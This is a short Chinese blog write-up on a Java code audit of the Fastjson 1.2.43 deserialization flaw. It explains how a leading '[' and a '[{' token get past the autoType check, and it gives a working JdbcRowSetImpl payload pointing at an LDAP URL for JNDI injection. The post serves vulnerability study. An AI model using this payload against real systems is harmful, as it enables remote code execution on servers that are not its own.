Java代码审计——Fastjson1.2.43反序列化漏洞

2022/3/1 12:22:14

本文主要是介绍Java代码审计——Fastjson1.2.43反序列化漏洞,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

0x00 前言

反序列化总纲

1.2.24可参考:1.2.24fastjson

1.2.25-1.2.41 可参考:1.2.25

1.2.25-1.2.42 可参考:1.2.42
这篇就单纯划水~

0x01 正文

在1.2.43中,修复了LL,但是又有新的东西可以利用,因为在loadclass中还会去处理"[“那么我们现在就可以通过”["进行绕过,先上payload再进行说明

String payload="{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"ldap://localhost:9999/a\",\"autoCommit\":true" ;

首先是[com.sun.rowset.JdbcRowSetImpl,通过这个方式可以过checkAutotype检测。
在这里插入图片描述
其次是[{,"dataSourceName,这里的[{主要目的是通过fastjson的自动检测,实际上就是对token进行控制,这里如果是[的话就会让token变为14从而通过之后的检测

在这里插入图片描述
在这里插入图片描述



这篇关于Java代码审计——Fastjson1.2.43反序列化漏洞的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!


扫一扫关注最新编程教程